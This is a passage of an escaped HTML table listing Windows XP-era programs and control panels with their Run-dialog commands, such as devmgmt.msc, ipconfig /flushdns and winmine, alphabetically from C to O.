&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Command Prompt&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;command&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Component Services&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;dcomcnfg&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Computer Management&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;compmgmt.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Compare Files&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;comp&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Control Panel&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;control&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Create a shared folder Wizard&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;shrpubw&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Date and Time Properties&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;timedate.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;DDE Shares&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ddeshare&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Device Manager&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;devmgmt.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Direct X Control Panel ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;directx.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Direct X Troubleshooter&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;dxdiag&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Disk Cleanup Utility&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;cleanmgr&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Disk Defragment&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;dfrg.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Disk Partition Manager&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;diskmgmt.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Display Properties&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;control desktop&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Display Properties&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;desk.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Display Properties (w/Appearance Tab Preselected )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;control color&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Dr. Watson System Troubleshooting Utility&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;drwtsn32&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Driver Verifier Utility&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;verifier&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Ethereal ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ethereal&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Event Viewer&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;eventvwr.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Files and Settings Transfer Tool&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;migwiz&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;File Signature Verification Tool&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;sigverif&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Findfast&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;findfast.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Firefox&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;firefox&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Folders Properties&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;control folders&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Fonts&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;fonts&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Fonts Folder&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;fonts&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Free Cell Card Game&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;freecell&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Game Controllers&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;joy.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Group Policy Editor ( xp pro )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;gpedit.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Hearts Card Game&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;mshearts&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Help and Support&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;helpctr&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Hyperterminal&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;hypertrm&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Hotline Client&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;hotlineclient&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Iexpress Wizard&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;iexpress&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Indexing Service&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ciadv.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Internet Connection Wizard&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;icwonn1&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Internet Properties&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;inetcpl.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Internet Setup Wizard&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;inetwiz&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;IP Configuration (Display Connection Configuration)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ipconfig /all&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;IP Configuration (Display DNS Cache Contents)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ipconfig /displaydns&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;IP Configuration (Delete DNS Cache Contents)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ipconfig /flushdns&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;IP Configuration (Release All Connections)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ipconfig /release&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;IP Configuration (Renew All Connections)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ipconfig /renew&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;IP Configuration (Refreshes DHCP &amp;amp; Re-Registers DNS)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ipconfig /registerdns&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;IP Configuration (Display DHCP Class ID)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ipconfig /showclassid&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;IP Configuration (Modifies DHCP Class ID)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ipconfig /setclassid&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Java Control Panel ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;jpicpl32.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Java Control Panel ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;javaws&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Keyboard Properties&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;control keyboard&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Local Security Settings&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;secpol.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Local Users and Groups&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;lusrmgr.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Logs You Out of Windows&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;logoff&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Malicious Software Removal Tool&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;mrt&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Microsoft Access ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;access.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Microsoft Chat&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;winchat&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Microsoft Excel ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;excel&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Microsoft Diskpart&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;diskpart&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Microsoft Frontpage ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;frontpg&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Microsoft Movie Maker&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;moviemk&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Microsoft Management Console&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;mmc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Microsoft Narrator&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;narrator&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Microsoft Paint&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;mspaint&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Microsoft Powerpoint&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;powerpnt&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Microsoft Word ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;winword&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Microsoft Syncronization Tool&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;mobsync&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Minesweeper Game&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;winmine&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Mouse Properties&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;control mouse&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Mouse Properties&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;main.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;MS-Dos Editor&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;edit&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;MS-Dos FTP&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ftp&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Nero ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;nero&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Netmeeting&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;conf&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Network Connections&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;control netconnections&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Network Connections&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ncpa.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Network Setup Wizard&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;netsetup.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Notepad&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;notepad&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Nview Desktop Manager ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;nvtuicpl.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Object Packager&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;packager&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ODBC Data Source Administrator&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;odbccp32&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ODBC Data Source Administrator&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;odbccp32.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;On Screen Keyboard&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;osk&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Opens AC3 Filter ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ac3filter.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
